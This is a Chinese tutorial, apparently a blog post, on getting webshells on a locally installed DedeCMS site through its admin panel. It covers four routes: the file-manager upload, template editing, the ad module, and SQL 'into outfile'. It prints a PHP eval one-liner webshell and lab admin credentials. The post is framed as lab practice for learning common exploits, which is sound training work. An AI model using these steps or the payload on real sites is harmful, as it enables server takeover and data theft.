dedecms织梦【php网站】-----获取webshell攻略

Dedecms 是 织梦团队 的php网站管理系统 使用 小皮搭建网站

1.搭建dedecms网站

下载Dedecms压缩包,解压后,放在小皮搭建的网站根目录下。

开启小皮的Apache或者Nginx和MySQL服务

2. 获取webshell

2.1 姿势⼀:通过⽂件管理器上传WebShell

思路:dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传 php⽂件获取webshell..

2.1.1 访问网站进行安装

访问网址:ip/网址根目录的文件名/其中的uploads文件夹/install

http://172.16.2.41/DedeCMS/uploads/install

逐步完成安装,参数配置 数据库连接小皮的MySQL数据库。

2.1.2 配置相关信息,并进行后台登录

#后台 http://172.16.1.10/dede

#信息

username:admin

password:123456

2.1.3 上传一句话木马

登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK

2.1.4 访问文件,蚁剑连接

双击shell.php访问,将url在蚁剑进行连接,即获得webshell

2.2 姿势⼆:修改模板⽂件拿WebShell

2.2.1 修改网站默认模板,写入一句话木马

与WPCMS类似,直接修改模板拿WebShell..

点击 【模板】 --》 【默认模板管理】 --》 【index.htm】

---》【修改】 在⽂件修改中添加phpinfo();....如下 点击保存

2.2.2 更新主页

点击 【⽣成】 --》 【更新主⻚ HTML 】 --》将主⻚位置修改为 【 ../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化.


2.2.3 访问主页

url:172.16.2.41/DedeCMS/uploads/index.php

点击浏览,即可发现phpinfo()执行成功

2.3 姿势三:后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】


点击【代码】

获取拼接的部分路径:/DedeCMS/uploads/plus/ad_js.php?aid=1

拼接url进行访问:http://172.16.2.41/DedeCMS/uploads/plus/ad_js.php?aid=1

蚁剑进行连接,即获得webshell

2.4 姿势四: 通过后台sql命令执⾏拿webshell

点击系统---SQL命令行工具
输入:select @@basedir; 发现页面显示目录地址 可判断出网站根目录

into outfile 写入一句话木马文件
select '<?php @eval($_POST[cmd]);>' into outfile 'E:/phpstudy_pro/WWW/shell.php'

访问该木马文件,蚁剑进行连接,即获得webshell

DEDECMS 织梦 网站框架常见漏洞的利用

多种获取shell的方法练习。

练习结束,望大家能有所帮助和收获。

拜拜。。。

-------------2025/3/20 21:51

相关推荐
还鮟1 小时前
CTF Web PHP弱类型与进制绕过(过滤)
php·ctf
zorro_z1 小时前
PHP语法基础篇(八):超全局变量
php
聚铭网络3 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary4 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
galaxylove7 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
九分源码10 小时前
基于PHP+MySQL组合开发开源问答网站平台源码系统 源码开源可二次开发 含完整的搭建指南
mysql·开源·php
RainSerein12 小时前
Laravel8中使用phpword生成word文档
word·php·laravel
mooyuan天天15 小时前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
pltrue15 小时前
Go 重构案例分享:订单创建逻辑重构
go·php
RainSerein16 小时前
Laravel8中调取腾讯云文字识别OCR
ocr·php·腾讯云·laravel